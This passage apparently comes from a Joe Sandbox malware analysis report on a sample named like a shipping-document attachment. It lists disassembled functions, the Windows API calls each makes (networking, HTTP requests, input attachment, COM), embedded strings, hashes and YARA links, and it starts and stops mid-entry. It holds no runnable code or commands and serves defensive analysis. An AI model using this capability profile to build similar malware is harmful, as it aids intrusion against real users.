                                                                • Instruction Fuzzy Hash: A8617C71904208AFDB10DFA8CD81EEEB7F8EF49710F10015AFA14AB2A1C775AD41DBA0
                                                                Function 00986B98 Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00986BBF
                                                                • SafeArrayAllocData.OLEAUT32(?), ref: 00986C18
                                                                • VariantInit.OLEAUT32(?), ref: 00986C2A
                                                                • SafeArrayAccessData.OLEAUT32(?,?), ref: 00986C4A
                                                                • VariantCopy.OLEAUT32(?,?), ref: 00986C9D
                                                                • SafeArrayUnaccessData.OLEAUT32(?), ref: 00986CB1
                                                                • VariantClear.OLEAUT32(?), ref: 00986CC6
                                                                • SafeArrayDestroyData.OLEAUT32(?), ref: 00986CD3
                                                                • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00986CDC
                                                                • VariantClear.OLEAUT32(?), ref: 00986CEE
                                                                • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00986CF9
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                • String ID:
                                                                • API String ID: 2706829360-0
                                                                • Opcode ID: 1b0310081707f0228b96723a38de25dd1916bb768cd0f44502078ac52158ab24
                                                                • Instruction ID: df71a16e43091d8ddc1ba8635f68ed45ea0dc1d815f69c9adddb89e717ca8510
                                                                • Opcode Fuzzy Hash: 1b0310081707f0228b96723a38de25dd1916bb768cd0f44502078ac52158ab24
                                                                • Instruction Fuzzy Hash: C1418271A141199FCF00EFA8DD58EAEBBB9EF48314F008169E955EB361CB70A945CF90
                                                                Function 009A83BB Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 00939837: __itow.LIBCMT ref: 00939862
                                                                  • Part of subcall function 00939837: __swprintf.LIBCMT ref: 009398AC
                                                                • CoInitialize.OLE32 ref: 009A8403
                                                                • CoUninitialize.OLE32 ref: 009A840E
                                                                • CoCreateInstance.OLE32(?,00000000,00000017,009C2BEC,?), ref: 009A846E
                                                                • IIDFromString.OLE32(?,?), ref: 009A84E1
                                                                • VariantInit.OLEAUT32(?), ref: 009A857B
                                                                • VariantClear.OLEAUT32(?), ref: 009A85DC
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                                • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                • API String ID: 834269672-1287834457
                                                                • Opcode ID: 3738ed88fd4233e3584d23b05032e49c04bb9d20bd794a9dcab4dca321fcb6ad
                                                                • Instruction ID: 1cf3fa71a2f8a9d879a98ac2fea17495bbffdff7b98c7d2bb5acac810a1eb68f
                                                                • Opcode Fuzzy Hash: 3738ed88fd4233e3584d23b05032e49c04bb9d20bd794a9dcab4dca321fcb6ad
                                                                • Instruction Fuzzy Hash: A3619C70608312AFC710DF54C848F6BBBE8AF8A754F004959F9869B2A1CB74ED44CBD2
                                                                Function 009A5732 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • WSAStartup.WSOCK32(00000101,?), ref: 009A5793
                                                                • inet_addr.WSOCK32(?,?,?), ref: 009A57D8
                                                                • gethostbyname.WSOCK32(?), ref: 009A57E4
                                                                • IcmpCreateFile.IPHLPAPI ref: 009A57F2
                                                                • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 009A5862
                                                                • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 009A5878
                                                                • IcmpCloseHandle.IPHLPAPI(00000000), ref: 009A58ED
                                                                • WSACleanup.WSOCK32 ref: 009A58F3
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                • String ID: Ping
                                                                • API String ID: 1028309954-2246546115
                                                                • Opcode ID: 65cbdc6bedf7aee30f50b96bd05f922a21d270e1755f6c73e6fb013163bb3d61
                                                                • Instruction ID: c7d22b0ca0ebcfdeec0344cc4306f93d46e985dd2735b1558c127dadaf9d509d
                                                                • Opcode Fuzzy Hash: 65cbdc6bedf7aee30f50b96bd05f922a21d270e1755f6c73e6fb013163bb3d61
                                                                • Instruction Fuzzy Hash: E55170716047009FD710EF28DC89B2AB7E4EF89720F054969F956DB2A1DB74E900DF81
                                                                Function 0099B4C3 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • SetErrorMode.KERNEL32(00000001), ref: 0099B4D0
                                                                • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0099B546
                                                                • GetLastError.KERNEL32 ref: 0099B550
                                                                • SetErrorMode.KERNEL32(00000000,READY), ref: 0099B5BD
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: Error$Mode$DiskFreeLastSpace
                                                                • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                • API String ID: 4194297153-14809454
                                                                • Opcode ID: dd89a6470ffb1dcae7f73a4a833b55c97ec2ffe0f33bd18e333faff92c025b3d
                                                                • Instruction ID: 6b5c8bc7c80181629d4329f0dfc4d468bd98769c47087a327df8d0682684743b
                                                                • Opcode Fuzzy Hash: dd89a6470ffb1dcae7f73a4a833b55c97ec2ffe0f33bd18e333faff92c025b3d
                                                                • Instruction Fuzzy Hash: D231A035A00209AFDF00EBACDA85BAEB7B8EF88315F154525F505DB291DB749E01CB42
                                                                Function 00988F8F Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 00937DE1: _memmove.LIBCMT ref: 00937E22
                                                                  • Part of subcall function 0098AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0098AABC
                                                                • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00989014
                                                                • GetDlgCtrlID.USER32 ref: 0098901F
                                                                • GetParent.USER32 ref: 0098903B
                                                                • SendMessageW.USER32(00000000,?,00000111,?), ref: 0098903E
                                                                • GetDlgCtrlID.USER32(?), ref: 00989047
                                                                • GetParent.USER32(?), ref: 00989063
                                                                • SendMessageW.USER32(00000000,?,?,00000111), ref: 00989066
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                • String ID: ComboBox$ListBox
                                                                • API String ID: 1536045017-1403004172
                                                                • Opcode ID: 591fd628361ee2a714fe92c3bf470fc57286a2b9b3094585ecfe367c0d6270ad
                                                                • Instruction ID: 3d394911e130f1448f40e943b3822a861d59de3e2894fddc3a419c5a1af7f6ef
                                                                • Opcode Fuzzy Hash: 591fd628361ee2a714fe92c3bf470fc57286a2b9b3094585ecfe367c0d6270ad
                                                                • Instruction Fuzzy Hash: FB21D370A00108BBDF05AFA0CC95EFEBB79EF89320F100216B922972E1DB755815DB20
                                                                Function 0098907A Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 00937DE1: _memmove.LIBCMT ref: 00937E22
                                                                  • Part of subcall function 0098AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0098AABC
                                                                • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 009890FD
                                                                • GetDlgCtrlID.USER32 ref: 00989108
                                                                • GetParent.USER32 ref: 00989124
                                                                • SendMessageW.USER32(00000000,?,00000111,?), ref: 00989127
                                                                • GetDlgCtrlID.USER32(?), ref: 00989130
                                                                • GetParent.USER32(?), ref: 0098914C
                                                                • SendMessageW.USER32(00000000,?,?,00000111), ref: 0098914F
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                • String ID: ComboBox$ListBox
                                                                • API String ID: 1536045017-1403004172
                                                                • Opcode ID: 6e22cd0d85ce5ad5c9ae62bc1f04281454269a38bc11859e86840dc2046bf397
                                                                • Instruction ID: 385abf24b25bf36a43adfd1baf55fc9e91bf229962a2c1ed0e01871758b42410
                                                                • Opcode Fuzzy Hash: 6e22cd0d85ce5ad5c9ae62bc1f04281454269a38bc11859e86840dc2046bf397
                                                                • Instruction Fuzzy Hash: 6E21D374A04108FBDF15ABA5CC89FFEBB78EF88310F040116B921972A1DB754815DB20
                                                                Function 00989163 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 72windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetParent.USER32 ref: 0098916F
                                                                • GetClassNameW.USER32(00000000,?,00000100), ref: 00989184
                                                                • _wcscmp.LIBCMT ref: 00989196
                                                                • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00989211
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: ClassMessageNameParentSend_wcscmp
                                                                • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                • API String ID: 1704125052-3381328864
                                                                • Opcode ID: 2b51cb341dcfd080da5836aa49fa88bef1df531e8f707f75d7a0927c26c6f74d
                                                                • Instruction ID: db45fcf8759fce97b974064d2f7ec0beefd581c7a5cdc4853a133f97c460bd67
                                                                • Opcode Fuzzy Hash: 2b51cb341dcfd080da5836aa49fa88bef1df531e8f707f75d7a0927c26c6f74d
                                                                • Instruction Fuzzy Hash: 9711203628C307BAEA123725EC0BEB7779C9F82324B200026FD10E01E2FE6568156B94
                                                                Function 009A88AB Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • VariantInit.OLEAUT32(?), ref: 009A88D7
                                                                • CoInitialize.OLE32(00000000), ref: 009A8904
                                                                • CoUninitialize.OLE32 ref: 009A890E
                                                                • GetRunningObjectTable.OLE32(00000000,?), ref: 009A8A0E
                                                                • SetErrorMode.KERNEL32(00000001,00000029), ref: 009A8B3B
                                                                • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,009C2C0C), ref: 009A8B6F
                                                                • CoGetObject.OLE32(?,00000000,009C2C0C,?), ref: 009A8B92
                                                                • SetErrorMode.KERNEL32(00000000), ref: 009A8BA5
                                                                • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 009A8C25
                                                                • VariantClear.OLEAUT32(?), ref: 009A8C35
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                • String ID:
                                                                • API String ID: 2395222682-0
                                                                • Opcode ID: bdf6adf80d647f94433616078f4035bf84e5ffd2bfbde520d1f08a7a0c15421d
                                                                • Instruction ID: 4ffb67a37f89c240eaa7690887b2a06d970e3f43d41bde3680380e6b3eeabc06
                                                                • Opcode Fuzzy Hash: bdf6adf80d647f94433616078f4035bf84e5ffd2bfbde520d1f08a7a0c15421d
                                                                • Instruction Fuzzy Hash: EEC107B1608305AFD700DF68C884A2BB7E9FF89758F00495DF98A9B251DB71ED05CB92
                                                                Function 00997990 Relevance: 15.3, APIs: 10, Instructions: 292COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 00997A6C
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: ArraySafeVartype
                                                                • String ID:
                                                                • API String ID: 1725837607-0
                                                                • Opcode ID: 69cc8dbdef52c20fae8ce09e9719953fc20b0442bd6c05343eccf4742d7cfde3
                                                                • Instruction ID: fd523edbd442c4d38541b73e947797cc867e766efcf4ed5e77ad78aa48a31ef8
                                                                • Opcode Fuzzy Hash: 69cc8dbdef52c20fae8ce09e9719953fc20b0442bd6c05343eccf4742d7cfde3
                                                                • Instruction Fuzzy Hash: 7FB18F7192820A9FDF00DFD8C885BBEF7B9EF49321F244429E941A7351EB34A941CB91
                                                                Function 009911CE Relevance: 15.1, APIs: 10, Instructions: 89threadCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetCurrentThreadId.KERNEL32 ref: 009911F0
                                                                • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00990268,?,00000001), ref: 00991204
                                                                • GetWindowThreadProcessId.USER32(00000000), ref: 0099120B
                                                                • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00990268,?,00000001), ref: 0099121A
                                                                • GetWindowThreadProcessId.USER32(?,00000000), ref: 0099122C
                                                                • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00990268,?,00000001), ref: 00991245
                                                                • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00990268,?,00000001), ref: 00991257
                                                                • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00990268,?,00000001), ref: 0099129C
                                                                • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00990268,?,00000001), ref: 009912B1
                                                                • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00990268,?,00000001), ref: 009912BC
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                • String ID:
                                                                • API String ID: 2156557900-0
                                                                • Opcode ID: 52f3f8c7acfccd6c939c09308c8172e6eacb8d2bb71de8cdb4e941089ab9a1c2
                                                                • Instruction ID: f6db837ad87f68881a8bedc1008e168a21c93c671d0cce2bf679935f99d68091
                                                                • Opcode Fuzzy Hash: 52f3f8c7acfccd6c939c09308c8172e6eacb8d2bb71de8cdb4e941089ab9a1c2
                                                                • Instruction Fuzzy Hash: 72318B75668309FBEF10AF58EE88BB937ADBB55321F144215FD10CA1A0D7749D80DB50
                                                                Function 0093FA5D Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 264comCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 0093FAA6
                                                                • OleUninitialize.OLE32(?,00000000), ref: 0093FB45
                                                                • UnregisterHotKey.USER32(?), ref: 0093FC9C
                                                                • DestroyWindow.USER32(?), ref: 009745D6
                                                                • FreeLibrary.KERNEL32(?), ref: 0097463B
                                                                • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00974668
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                • String ID: close all
                                                                • API String ID: 469580280-3243417748
                                                                • Opcode ID: 02e15209a7745bd1263a55ed9beec797b62b8ce0617e15238d6cc4130b2f6c83
                                                                • Instruction ID: 129b80cb3fe52de5db2ddca65e1e29533835d41a2ebb68246554f6c47d38321c
                                                                • Opcode Fuzzy Hash: 02e15209a7745bd1263a55ed9beec797b62b8ce0617e15238d6cc4130b2f6c83
                                                                • Instruction Fuzzy Hash: 5BA15E71701212CFCB19EF14C9A5B69F368BF45710F5586ADE80EAB262DB30AD16CF50
                                                                Function 0098A068 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • EnumChildWindows.USER32(?,0098A439), ref: 0098A377
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: ChildEnumWindows
                                                                • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                • API String ID: 3555792229-1603158881
                                                                • Opcode ID: 93770ec67191ffff5d5a01873c0cae4465c064558fa3725c98a845b809b20da5
                                                                • Instruction ID: ef7ad5dd728730313d6461f388593a08119c66ffabba86ad753e3ccc9800df31
                                                                • Opcode Fuzzy Hash: 93770ec67191ffff5d5a01873c0cae4465c064558fa3725c98a845b809b20da5
                                                                • Instruction Fuzzy Hash: DF91D731604605ABEB28EFA0C446BEEFBB8FF44300F54851BE959A7341DF316999CB91
                                                                Function 00932E26 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • SetWindowLongW.USER32(?,000000EB), ref: 00932EAE
                                                                  • Part of subcall function 00931DB3: GetClientRect.USER32(?,?), ref: 00931DDC
                                                                  • Part of subcall function 00931DB3: GetWindowRect.USER32(?,?), ref: 00931E1D
                                                                  • Part of subcall function 00931DB3: ScreenToClient.USER32(?,?), ref: 00931E45
                                                                • GetDC.USER32 ref: 0096CD32
                                                                • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0096CD45
                                                                • SelectObject.GDI32(00000000,00000000), ref: 0096CD53
                                                                • SelectObject.GDI32(00000000,00000000), ref: 0096CD68
                                                                • ReleaseDC.USER32(?,00000000), ref: 0096CD70
                                                                • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0096CDFB
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                • String ID: U
                                                                • API String ID: 4009187628-3372436214
                                                                • Opcode ID: 6098cde24b0618593c16d7727b4e2ffb40fb8b0b963714a7ebbf7d988a59adf2
                                                                • Instruction ID: 3068efe4340dd00ab1fbb345dbadbf91168b77d231a5019a56de11960f1dc1e5
                                                                • Opcode Fuzzy Hash: 6098cde24b0618593c16d7727b4e2ffb40fb8b0b963714a7ebbf7d988a59adf2
                                                                • Instruction Fuzzy Hash: 7D71DF71404209DFCF218F64CC95ABA7BB9FF48360F14466AFD955A2A6C7359C40EF60
                                                                Function 009A1A15 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 134networkCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 009A1A50
                                                                • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 009A1A7C
                                                                • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 009A1ABE
                                                                • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 009A1AD3
                                                                • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 009A1AE0
                                                                • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 009A1B10
                                                                • InternetCloseHandle.WININET(00000000), ref: 009A1B57
                                                                  • Part of subcall function 009A2483: GetLastError.KERNEL32(?,?,009A1817,00000000,00000000,00000001), ref: 009A2498
                                                                  • Part of subcall function 009A2483: SetEvent.KERNEL32(?,?,009A1817,00000000,00000000,00000001), ref: 009A24AD
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
